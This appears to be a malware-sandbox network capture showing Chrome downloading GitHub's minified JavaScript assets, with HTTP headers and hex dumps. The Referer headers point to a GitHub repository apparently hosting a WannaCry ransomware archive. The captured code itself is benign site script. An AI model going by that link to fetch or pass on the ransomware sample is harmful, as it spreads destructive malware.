                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 61 74 69 6f 6e 3a 72 6f 74 61 74 65 2d 6b 65 79 66 72 61 6d 65 73 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 22 2c 22 22 5d 2c 61 2e 5a 29 3b 63 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 70 69 6e 6e 65 72 22 7d 2c 39 37 30 31 31 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 6e 28 31 35 33 38 38 29 2c 6f 3d 6e 28 34 32 33 37 39 29 2c 61 3d 6e 28 31 35 31 37 33 29 3b 6c 65 74 20 69 3d 72 2e 5a 50 2e 73 70 61 6e 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 54 65 78 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 31 37 76 31 78 65 75 2d 30 22 7d 29 28 5b 22 22 2c 22 3b 22 2c 22 3b 22 2c 22 3b 22 5d 2c 6f 2e 6c 24 2c 6f 2e 43 57 2c 61 2e 5a 29
                                                                                      Data Ascii: ation:rotate-keyframes 1s linear infinite;",""],a.Z);c.displayName="Spinner"},97011:(e,t,n)=>{n.d(t,{Z:()=>i});var r=n(15388),o=n(42379),a=n(15173);let i=r.ZP.span.withConfig({displayName:"Text",componentId:"sc-17v1xeu-0"})(["",";",";",";"],o.l$,o.CW,a.Z)


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      70192.168.2.1649775185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC661OUTGET /assets/keyboard-shortcuts-dialog-20a011926f27.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 30314
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 17:53:39 GMT
                                                                                      ETag: 0x8DC483D82409689
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 172621
                                                                                      X-Served-By: cache-iad-kjyo7100100-IAD, cache-ewr18145-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 37, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4a048f418088a63798610f8eb842ee08284b6fac
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6b 65 79 62 6f 61 72 64 2d 73 68 6f 72 74 63 75 74 73 2d 64 69 61 6c 6f 67 22 5d 2c 7b 34 30 35 37 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 6c 65 74 20 6e 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 69 66 28 21 6e 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6c 69 65 6e 74 20 65 6e 76 20 77 61 73 20 72 65 71 75 65 73 74 65 64 20 62 65 66 6f 72 65 20 69 74 20 77 61 73 20 6c 6f 61 64 65 64 2e 20 54 68 69 73 20 6c 69 6b 65 6c 79 20 6d 65 61 6e 73 20 79 6f 75 20 61 72 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f 20 75 73 65 20 63 6c 69 65 6e 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["keyboard-shortcuts-dialog"],{40578:(e,t,r)=>{let n;function a(){if(!n)throw Error("Client env was requested before it was loaded. This likely means you are attempting to use client
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 61 2e 55 6e 6b 6e 6f 77 6e 2c 74 3d 21 31 3b 69 66 28 6e 2e 69 47 29 7b 6c 65 74 20 72 3d 6e 2e 69 47 2e 6e 61 76 69 67 61 74 6f 72 2c 69 3d 72 2e 75 73 65 72 41 67 65 6e 74 2c 6f 3d 72 3f 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 3f 2e 70 6c 61 74 66 6f 72 6d 7c 7c 72 2e 70 6c 61 74 66 6f 72 6d 3b 2d 31 21 3d 3d 5b 22 4d 61 63 69 6e 74 6f 73 68 22 2c 22 4d 61 63 49 6e 74 65 6c 22 2c 22 4d 61 63 50 50 43 22 2c 22 4d 61 63 36 38 4b 22 2c 22 6d 61 63 4f 53 22 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 3f 65 3d 61 2e 6d 61 63 4f 53 3a 2d 31 21 3d 3d 5b 22 69 50 68 6f 6e 65 22 2c 22 69 50 61 64 22 2c 22 69 50 6f 64 22 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 3f 65 3d 61 2e 69 4f 53 3a 2d 31 21 3d 3d 5b 22 57 69 6e 33
                                                                                      Data Ascii: function(){let e=a.Unknown,t=!1;if(n.iG){let r=n.iG.navigator,i=r.userAgent,o=r?.userAgentData?.platform||r.platform;-1!==["Macintosh","MacIntel","MacPPC","Mac68K","macOS"].indexOf(o)?e=a.macOS:-1!==["iPhone","iPad","iPod"].indexOf(o)?e=a.iOS:-1!==["Win3
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 3d 22 74 72 75 65 22 3d 3d 3d 65 2e 61 72 69 61 52 65 61 64 4f 6e 6c 79 7c 7c 22 74 72 75 65 22 3d 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 72 65 61 64 6f 6e 6c 79 22 29 7c 7c 6e 75 6c 6c 21 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 72 65 61 64 6f 6e 6c 79 22 29 3b 72 65 74 75 72 6e 28 22 73 65 6c 65 63 74 22 3d 3d 3d 74 7c 7c 22 74 65 78 74 61 72 65 61 22 3d 3d 3d 74 7c 7c 22 69 6e 70 75 74 22 3d 3d 3d 74 26 26 21 73 2e 68 61 73 28 72 29 7c 7c 65 2e 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 29 26 26 21 6e 7d 28 65 2e 74 61 72 67 65 74 29 26 26 28 30 2c 6e 2e 63 29 28 22 6e 6f 5f 63 68 61 72 61 63 74 65 72 5f 6b 65 79 5f 73 68 6f 72 74 63 75 74 73 5f 69 6e 5f 69 6e 70 75 74 73 22 29 2c 6c 3d 69 28 29 26
                                                                                      Data Ascii: n="true"===e.ariaReadOnly||"true"===e.getAttribute("aria-readonly")||null!==e.getAttribute("readonly");return("select"===t||"textarea"===t||"input"===t&&!s.has(r)||e.isContentEditable)&&!n}(e.target)&&(0,n.c)("no_character_key_shortcuts_in_inputs"),l=i()&
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 36 39 34 32 37 29 3b 76 61 72 20 67 3d 72 28 38 37 36 32 33 29 2c 79 3d 72 28 37 31 34 38 33 29 3b 6c 65 74 20 62 3d 28 29 3d 3e 28 30 2c 61 2e 6a 73 78 73 29 28 6c 2e 5a 2c 7b 72 6f 6c 65 3a 22 73 74 61 74 75 73 22 2c 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 61 2e 6a 73 78 29 28 64 2e 5a 2c 7b 73 69 7a 65 3a 22 6c 61 72 67 65 22 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 73 2e 54 2c 7b 63 68 69 6c 64 72 65 6e 3a 66 2e 6c 6f 61 64 69 6e 67 7d 29 5d 7d 29 2c 76 3d 65 3d 3e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 2e
                                                                                      Data Ascii: (69427);var g=r(87623),y=r(71483);let b=()=>(0,a.jsxs)(l.Z,{role:"status",sx:{display:"flex",height:"100%",justifyContent:"center",alignItems:"center"},children:[(0,a.jsx)(d.Z,{size:"large"}),(0,a.jsx)(s.T,{children:f.loading})]}),v=e=>Array.isArray(e)?e.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6d 6d 61 6e 64 73 3a 65 2e 63 6f 6d 6d 61 6e 64 73 2e 6d 61 70 28 65 3d 3e 28 7b 2e 2e 2e 65 2c 6b 65 79 62 69 6e 64 69 6e 67 3a 76 28 65 2e 6b 65 79 62 69 6e 64 69 6e 67 29 7d 29 29 7d 29 29 29 3b 64 28 21 31 29 7d 3b 65 26 26 72 28 29 7d 2c 5b 65 5d 29 2c 65 29 3f 28 30 2c 61 2e 6a 73 78 29 28 75 2e 56 2c 7b 74 69 74 6c 65 3a 66 2e 6b 65 79 62 6f 61 72 64 53 68 6f 72 74 63 75 74 73 2c 22 61 72 69 61 2d 6d 6f 64 61 6c 22 3a 22 74 72 75 65 22 2c 77 69 64 74 68 3a 22 78 6c 61 72 67 65 22 2c 68 65 69 67 68 74 3a 22 6c 61 72 67 65 22 2c 6f 6e 43 6c 6f 73 65 3a 28 29 3d 3e 74 28 21 31 29 2c 73 78 3a 7b 63 6f 6c 6f 72 3a 22 66 67 2e 64 65 66 61 75 6c 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 6c 3f 28 30 2c 61 2e 6a 73 78 29 28 62 2c 7b 7d 29 3a 28 30 2c 61 2e 6a
                                                                                      Data Ascii: mmands:e.commands.map(e=>({...e,keybinding:v(e.keybinding)}))})));d(!1)};e&&r()},[e]),e)?(0,a.jsx)(u.V,{title:f.keyboardShortcuts,"aria-modal":"true",width:"xlarge",height:"large",onClose:()=>t(!1),sx:{color:"fg.default"},children:l?(0,a.jsx)(b,{}):(0,a.j
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 72 69 65 73 5b 65 5d 3d 7b 70 72 6f 6d 69 73 65 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 74 29 7d 7d 67 65 74 52 65 67 69 73 74 72 61 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 28 74 3d 74 68 69 73 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 45 6e 74 72 69 65 73 29 5b 65 5d 7c 7c 28 74 5b 65 5d 3d 6e 65 77 20 6e 29 2c 74 68 69 73 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 45 6e 74 72 69 65 73 5b 65 5d 2e 70 72 6f 6d 69 73 65 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 45 6e 74 72 69 65 73 3d 7b 7d 7d 7d 3b 6c 65 74 20 6e 3d 63 6c 61 73 73 20 44 65 66 65 72 72 65 64 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 70 72 6f 6d 69 73 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28
                                                                                      Data Ascii: tries[e]={promise:Promise.resolve(t)}}getRegistration(e){var t;return(t=this.registrationEntries)[e]||(t[e]=new n),this.registrationEntries[e].promise}constructor(){this.registrationEntries={}}};let n=class Deferred{constructor(){this.promise=new Promise(
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 53 65 72 76 65 72 52 65 6e 64 65 72 65 64 3a 74 68 69 73 2e 68 61 73 53 53 52 43 6f 6e 74 65 6e 74 2c 73 73 72 45 72 72 6f 72 3a 74 68 69 73 2e 73 73 72 45 72 72 6f 72 2c 61 6e 63 68 6f 72 45 6c 65 6d 65 6e 74 3a 6e 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 2e 2e 2e 65 29 7b 73 75 70 65 72 28 2e 2e 2e 65 29 2c 74 68 69 73 2e 6e 61 6d 65 41 74 74 72 69 62 75 74 65 3d 22 70 61 72 74 69 61 6c 2d 6e 61 6d 65 22 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 61 2e 72 65 67 69 73 74 65 72 28 65 2c 74 29 7d 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 61 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6f 3d 69 3c 33 3f 74 3a 6e 75 6c 6c 3d 3d 3d 6e 3f 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                                                                      Data Ascii: sServerRendered:this.hasSSRContent,ssrError:this.ssrError,anchorElement:n})}constructor(...e){super(...e),this.nameAttribute="partial-name"}};function c(e,t){a.register(e,t)}d=function(e,t,r,n){var a,i=arguments.length,o=i<3?t:null===n?n=Object.getOwnProp
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 65 77 20 69 7d 6c 65 74 7b 74 68 72 6f 77 51 75 6f 74 61 45 72 72 6f 72 73 4f 6e 53 65 74 3a 64 7d 3d 74 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 2e 73 65 6e 64 43 61 63 68 65 53 74 61 74 73 26 26 28 30 2c 61 2e 62 29 28 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 74 72 79 7b 69 66 28 6c 2e 72 65 6d 6f 76 65 49 74 65 6d 28 65 29 2c 74 2e 74 74 6c 29 7b 6c 65 74 20 74 3d 60 24 7b 65 7d 3a 65 78 70 69 72 79 60 3b 6c 2e 72 65 6d 6f 76 65 49 74 65 6d 28 74 29 7d 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 7b 67 65 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 3d 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 29 7b 74 72 79 7b 6c 65 74 20 72 3d 6c 2e 67 65 74 49 74 65
                                                                                      Data Ascii: new i}let{throwQuotaErrorsOnSet:d}=t;function c(e){t.sendCacheStats&&(0,a.b)({incrementKey:e})}function u(e){try{if(l.removeItem(e),t.ttl){let t=`${e}:expiry`;l.removeItem(t)}}catch(e){}}return{getItem:function(e,t=new Date().getTime()){try{let r=l.getIte
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 7c 7c 21 21 6e 2e 6e 34 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 72 65 61 63 74 2d 61 70 70 5b 64 61 74 61 2d 73 73 72 3d 22 74 72 75 65 22 5d 27 29 7d 7d 2c 34 33 37 38 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 42 3a 28 29 3d 3e 6d 2c 62 3a 28 29 3d 3e 6c 7d 29 3b 76 61 72 20 6e 3d 72 28 37 31 32 30 37 29 2c 61 3d 72 28 38 37 32 37 34 29 2c 69 3d 72 28 35 34 35 30 38 29 2c 6f 3d 72 28 31 38 35 31 35 29 3b 6c 65 74 20 73 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 3d 21 31 2c 72 3d 31 29 7b 69 66 28 21 30 21 3d 3d 28 30 2c 6f 2e 63 29 28 22 42 52 4f 57 53 45 52 5f 53 54 41 54 53 5f 44 49 53 41 42 4c 45 44 22 29 29 7b 69 66 28 72 3c 30 7c 7c 72 3e 31 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 53 61 6d 70 6c 69
                                                                                      Data Ascii: ||!!n.n4.querySelector('react-app[data-ssr="true"]')}},43786:(e,t,r)=>{r.d(t,{B:()=>m,b:()=>l});var n=r(71207),a=r(87274),i=r(54508),o=r(18515);let s=[];function l(e,t=!1,r=1){if(!0!==(0,o.c)("BROWSER_STATS_DISABLED")){if(r<0||r>1)throw RangeError("Sampli
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 63 6f 6d 6d 61 6e 64 49 64 3d 65 7d 7d 3b 6c 65 74 20 61 3d 7b 65 6e 74 72 69 65 73 3a 65 3d 3e 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 29 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 2e 6d 6d 2e 69 73 28 65 5b 30 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 5b 31 5d 29 2c 6b 65 79 73 3a 65 3d 3e 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 69 6c 74 65 72 28 6e 2e 6d 6d 2e 69 73 29 7d 7d 2c 35 32 30 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 56 3a 28 29 3d 3e 6c 2c 65 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 6e 3d 72 28 36 37 32 39 34 29 2c 61 3d 72 28 38 32 33 34 37 29 2c 69 3d 72 28 36 39 34 32 37 29 3b 6c 65 74 20 6f 3d 6e 65 77 20 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 6c 65 74 20 65 3d 6e 65 77 20 4d 61 70 3b 66 6f 72 28 6c
                                                                                      Data Ascii: .commandId=e}};let a={entries:e=>Object.entries(e).filter(e=>n.mm.is(e[0])&&void 0!==e[1]),keys:e=>Object.keys(e).filter(n.mm.is)}},5202:(e,t,r)=>{r.d(t,{V:()=>l,e:()=>s});var n=r(67294),a=r(82347),i=r(69427);let o=new Map;function s(){let e=new Map;for(l


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      71192.168.2.1649776185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-11f6759e1cef.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 14828
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 22:48:36 GMT
                                                                                      ETag: 0x8DC3EF8B97BB268
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 1285252
                                                                                      X-Served-By: cache-iad-kiad7000177-IAD, cache-ewr18169-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 668, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: be37a7b6bd00e15b3ccec48741159bd34955a75b
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 39 34 66 64 36 37 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 6d 70 6c
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_templ
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6c 29 2e 74 68 65 6e 28 61 73 79 6e 63 20 65 3d 3e 7b 69 66 28 65 29 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 73 29 61 77 61 69 74 20 65 28 74 29 3b 68 28 61 29 2e 74 68 65 6e 28 75 2c 63 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 7d 29 2e 74 68 65 6e 28 28 29 3d 3e 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 6f 29 65 28 74 29 7d 29 7d 65 6c 73 65 20 74 2e 73 75 62 6d 69 74 28 29 7d 2c 65 3d 3e 7b 74 2e 73 75 62 6d 69 74 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 72 6f 77 20 65 7d 29 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 2c 72 29 7b 6c 65 74 20 6f 3d 21 31 3b 66 6f 72 28 6c 65 74 20 73 20 6f 66 20 65 29 7b 6c 65 74 5b 65 2c 61 5d 3d 69 28 29 2c 6c 3d 28 29 3d 3e 28 6f 3d 21 30 2c 61 28 29 2c 72 29 2c 75
                                                                                      Data Ascii: l).then(async e=>{if(e){for(let e of s)await e(t);h(a).then(u,c).catch(()=>{}).then(()=>{for(let e of o)e(t)})}else t.submit()},e=>{t.submit(),setTimeout(()=>{throw e})})}async function p(e,t,n,r){let o=!1;for(let s of e){let[e,a]=i(),l=()=>(o=!0,a(),r),u
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 73 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 7d 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 3d 5b 5d 3b 76 61 72 20 61 3d 2f 5e 23 28 28 3f 3a 5b 5c 77 5c 75 30 30 63 30 2d 5c 75 46 46 46 46 5c 2d 5d 7c 5c 5c 2e 29 2b 29 2f 67 3b 72 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 22 49 44 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 74 3d 65 2e
                                                                                      Data Ascii: chesSelector=function(e,t){return s.call(e,t)},r.prototype.querySelectorAll=function(e,t){return t.querySelectorAll(e)},r.prototype.indexes=[];var a=/^#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/g;r.prototype.indexes.push({name:"ID",selector:function(e){var t;if(t=e.
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 28 69 3d 63 2e 65 78 65 63 28 75 29 29 26 26 28 75 3d 69 5b 33 5d 2c 69 5b 32 5d 7c 7c 21 75 29 29 7b 66 6f 72 28 6e 3d 30 3b 6e 3c 6c 3b 6e 2b 2b 29 69 66 28 73 3d 28 61 3d 65 5b 6e 5d 29 2e 73 65 6c 65 63 74 6f 72 28 69 5b 31 5d 29 29 7b 66 6f 72 28 72 3d 70 2e 6c 65 6e 67 74 68 2c 6f 3d 21 31 3b 72 2d 2d 3b 29 69 66 28 70 5b 72 5d 2e 69 6e 64 65 78 3d 3d 3d 61 26 26 70 5b 72 5d 2e 6b 65 79 3d 3d 3d 73 29 7b 6f 3d 21 30 3b 62 72 65 61 6b 7d 6f 7c 7c 70 2e 70 75 73 68 28 7b 69 6e 64 65 78 3a 61 2c 6b 65 79 3a 73 7d 29 3b 62 72 65 61 6b 7d 7d 77 68 69 6c 65 28 69 29 72 65 74 75 72 6e 20 70 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 2d 74 2e 69 64 7d 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 6f 67 44 65 66 61 75 6c 74
                                                                                      Data Ascii: (i=c.exec(u))&&(u=i[3],i[2]||!u)){for(n=0;n<l;n++)if(s=(a=e[n]).selector(i[1])){for(r=p.length,o=!1;r--;)if(p[r].index===a&&p[r].key===s){o=!0;break}o||p.push({index:a,key:s});break}}while(i)return p}function h(e,t){return e.id-t.id}r.prototype.logDefault
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 2e 73 65 6c 65 63 74 6f 72 73 2e 6a 6f 69 6e 28 22 2c 20 22 29 2c 65 29 3b 66 6f 72 28 74 3d 30 2c 72 3d 70 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 66 6f 72 28 6e 3d 30 2c 6f 3d 70 5b 74 5d 2c 69 3d 28 73 3d 74 68 69 73 2e 6d 61 74 63 68 65 73 28 6f 29 29 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 75 5b 28 6c 3d 73 5b 6e 5d 29 2e 69 64 5d 3f 61 3d 75 5b 6c 2e 69 64 5d 3a 28 61 3d 7b 69 64 3a 6c 2e 69 64 2c 73 65 6c 65 63 74 6f 72 3a 6c 2e 73 65 6c 65 63 74 6f 72 2c 64 61 74 61 3a 6c 2e 64 61 74 61 2c 65 6c 65 6d 65 6e 74 73 3a 5b 5d 7d 2c 75 5b 6c 2e 69 64 5d 3d 61 2c 63 2e 70 75 73 68 28 61 29 29 2c 61 2e 65 6c 65 6d 65 6e 74 73 2e 70 75 73 68 28 6f 29 3b 72 65 74 75 72 6e 20 63 2e 73 6f 72 74 28 68 29 7d 2c 72 2e 70 72 6f 74 6f 74 79 70
                                                                                      Data Ascii: s.selectors.join(", "),e);for(t=0,r=p.length;t<r;t++)for(n=0,o=p[t],i=(s=this.matches(o)).length;n<i;n++)u[(l=s[n]).id]?a=u[l.id]:(a={id:l.id,selector:l.selector,data:l.data,elements:[]},u[l.id]=a,c.push(a)),a.elements.push(o);return c.sort(h)},r.prototyp
